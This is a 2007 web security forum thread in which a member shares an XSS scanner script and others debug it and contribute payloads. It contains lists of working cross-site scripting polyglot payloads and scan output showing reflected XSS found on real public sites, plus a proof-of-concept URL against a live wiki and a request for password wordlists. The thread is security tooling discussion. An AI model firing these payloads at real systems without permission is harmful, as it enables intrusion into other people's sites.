Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Greetings , XSSscanner
Posted by: d3hydr8
Date: June 01, 2007 10:45AM

I was searching for an XSS scanner to compare to mine and get some feedback and it led me here. I posted my script in a blog from Aug 2006 and figured it would never get seen so I decided to post it here. Obviously I'm not an XSS wizard but this works by checking http responses and "source" searching. Any feedback would be great , I have added a few new options. Read the code heading/options for the details.

Link:
http://www.darkc0de.com/scanners/XSSscan.py | XSSscan.py



Edited 2 time(s). Last edit at 07/30/2007 05:41PM by d3hydr8.

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: WhiteAcid
Date: June 01, 2007 11:03AM

Welcome to the forums.
I ran your code but couldn't get it to work.
Here's the code I ran it on:
<?php echo @$_GET['x']; ?>
<a href="?x=<script>alert(1)</script>">I'm vuln</a>
Here's the output:
Quote

p$ ./XSSscan.py -site 127.0.0.1/xss.php

d3hydr8[at]gmail[dot]com XSS Scanner v1.1
-----------------------------------------------

[+] XSS_scan Loaded
[+] Verbose Mode Off
[+] Alert: D3HYDR8%2D0wNz%2DY0U
[+] Site: 127.0.0.1/xss.php
[+] Started: Fri Jun 1 17:02:26 2007

---------------------------------------------
[+] Searching: 127.0.0.1/xss.php
[+] Variables: 1 | Actions: 0 | Fields: 0
-----------------------------------------------------------------


[+] Potential XSS found: 0


[-] Done - Fri Jun 1 17:02:32 2007
Here's the apache logs:
Quote

127.0.0.1 - - [01/Jun/2007:17:02:29 +0100] "GET /xss.php HTTP/1.1" 200 52 "-" "Python-urllib/2.5"
127.0.0.1 - - [01/Jun/2007:17:02:29 +0100] "GET /xss.php/?x=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E HTTP/1.1" 200 96 "-" "-"
127.0.0.1 - - [01/Jun/2007:17:02:29 +0100] "GET /xss.php/?x=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E HTTP/1.1" 200 96 "-" "Python-urllib/2.5"

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: d3hydr8
Date: June 01, 2007 11:25AM

OK I found the problem, go upload it again and test it out. .replace("%2D","-") fixes it.

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: WhiteAcid
Date: June 01, 2007 12:13PM

I know this isn't the right section for a discussion about this tool. But another bug:
$ ./XSSscan.py -site wikkawiki.org/UserSettings gives zero XSSes found when here's a PoC for an XSS on that page: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://wikkawiki.org/UserSettings&name=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&action=login

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: d3hydr8
Date: June 01, 2007 12:30PM

I don't see the bug, wheres the xss in that site , the POC doesn't show one? I know it works, try another site.
Heres an example of it working i just ran.

d3hydr8@linuxbox:~> python xxsscan_test.py -s http://alioth.debian.org/forum/forum.php

d3hydr8[at]gmail[dot]com XSS Scanner v1.1
-----------------------------------------------

[+] XSS_scan Loaded
[+] Verbose Mode Off
[+] Alert: D3HYDR8%2D0wNz%2DY0U
[+] Site: http://alioth.debian.org/forum/forum.php
[+] Started: Sat Jun 2 13:31:41 2007

---------------------------------------------
[+] Searching: alioth.debian.org/forum/forum.php
[+] Variables: 0 | Actions: 1 | Fields: 3

[!] XSS: alioth.debian.org/forum/?words=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E
[+] Response: 200 OK
[+] Collecting Emails: alioth.debian.org

[!] XSS: alioth.debian.org/?words=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E
[+] Response: 200 OK

[!] XSS: alioth.debian.org/forum/forum.php/?words=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E
[+] Response: 200 OK

[!] XSS: alioth.debian.org/search/?words=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E
[+] Response: 200 OK
-----------------------------------------------------------------


[+] Potential XSS found: 4


[1] alioth.debian.org/search/?words=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E

[2] alioth.debian.org/forum/?words=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E

[3] alioth.debian.org/forum/forum.php/?words=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E

[4] alioth.debian.org/?words=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E

[-] Done - Sat Jun 2 13:31:58 2007

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: WhiteAcid
Date: June 01, 2007 12:44PM

Go to the PoC and hit the submit button. I used that page to create a dynamic form as the vulnerable page needs you to submit the stuff via POST.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: d3hydr8
Date: June 01, 2007 03:34PM

Is there anyway this can be moved to a better section on the forum?

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: WhiteAcid
Date: June 01, 2007 03:46PM

rsnake|id: could one of you move the appropriate posts here to the projects section please?

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: id
Date: June 01, 2007 06:42PM

moved

-id

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: klaus
Date: June 01, 2007 08:50PM

d3hydr8, can you share your wordlists? (server gives not found/not auth)
http://darkcode.ath.cx/w0rdlists/wordlists.html

Edited: Got it. It's just the old packetstorm files. Thanks anyway.



Edited 1 time(s). Last edit at 06/01/2007 08:56PM by klaus.

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: d3hydr8
Date: June 02, 2007 08:53AM

They still will work, until people stop using words for passwords :P I haven't updated that section in a long time.

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: Anonymous User
Date: June 03, 2007 06:44AM

Hi d3hydr8.

Nice tool but I think one vector is a little bit too few - why not storng the payload in an array rather than in a single string? You could iterate through your payload array for any request qhich is fired to avoid overseeing LHF.

I created an almost similar approach for an XSS scanner - but in Javascript. The tool isn't maintained at the moment because I don't have time for that but if you want you can use the payload.

http://lfh.heideri.ch/lib/LFH.lib.LFH.js

/**
objXSSScanner.arrPayload 	= [
'<script>alert(String.fromCharCode(88,83,83));</script>',
'\';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{<script>alert(\'xss\')</script>}',
'\'\';!--"<script>alert(String.fromCharCode(88,83,83));</script>=&{()}',
'");alert(String.fromCharCode(88,83,83));//',
'"><script>alert(\'xss\');</script>',
';}alert("XSS");{',
'"+alert("xss")+"',
'c%00""<script>alert(String.fromCharCode(88,83,83));</script>'
];
**/

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: d3hydr8
Date: June 03, 2007 10:06AM

Thats a good idea, in case its not vulnerable to my

xss = "%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E"

it might be to other types of attacks. I will work on that and post back. I also want to add proxy support. Thanks for the feedback

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: Anonymous User
Date: June 03, 2007 10:32AM

You're welcome - you can also use the stuff from the following file to get better coverage and detection rates:

http://mario.heideri.ch/xss.xml

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: sunday
Date: June 03, 2007 04:27PM

I also use a xss scanner (or as i call it my xss can) it's not as full featured as yours but it gets the job done.

Source: http://coco.cd.chalmers.se/ola/xss/xsscan.py
Usage: http://coco.cd.chalmers.se/ola/xss/xsscan

You will need the libxml2dom library to run it: http://www.boddie.org.uk/python/libxml2dom.html

#&

Options: ReplyQuote
Updated Version 1.2
Posted by: d3hydr8
Date: June 05, 2007 11:17AM

This is my update for my XSSscanner. I've added the use of more xss payloads, fixed an exception and added more runtime feedback for the user along with fixing a few.

http://www.darkc0de.com/scanners/XSSscan.py | XSSscanner



Edited 1 time(s). Last edit at 07/30/2007 05:41PM by d3hydr8.

Options: ReplyQuote
Re: Updated Version 1.2
Posted by: Anonymous User
Date: June 05, 2007 01:43PM

Hi!

Looking good - although ( just a cosmetic issue ) it would be cool to have the single payload elements separated by newlines - enhances readability of the source.

Greetings,
.mario

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: d3hydr8
Date: June 05, 2007 04:10PM

And would make it easier for someone to add more or subtract, depending on how versatile they want it. Good suggestion, I will change that when I get home. Thanks

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: d3hydr8
Date: June 05, 2007 11:02PM

Alright I have fixed that and fixed another syntax error with writing to a file.

http://www.darkc0de.com/scanners/XSSscan.py | XSS Scanner



Edited 1 time(s). Last edit at 07/30/2007 05:42PM by d3hydr8.

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: Anonymous User
Date: June 06, 2007 01:40AM

Hi!

I would definitely recommend you to use those vectors too - it breaks HTML, Comments, Javascript and each of them double- and single-quoted. The second version also breaks title tags (works perfectly on dirty-coded wordpress templates). Also I am missing a vector to break textareas.

';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function

';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}

</textarea><script>alert(1)</script>

Greetings,
.mario

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: d3hydr8
Date: June 06, 2007 11:30AM

Update: Ok I have added those payloads and made some more changes

added https support, more xss payloads, the ability to change port, fixed some user input problems, exiting without error messages with Ctrl-C (KeyboardInterrupt)

http://www.darkc0de.com/scanners/XSSscan.py | XSS Scanner



Edited 1 time(s). Last edit at 07/30/2007 05:42PM by d3hydr8.

Options: ReplyQuote
Re: Greetings , XSSscanner
Posted by: hackathology
Date: July 25, 2007 03:29AM

downloaded 1.3, however, had not tested it. Thanks

http://hackathology.blogspot.com

Options: ReplyQuote


Sorry, only registered users may post in this forum.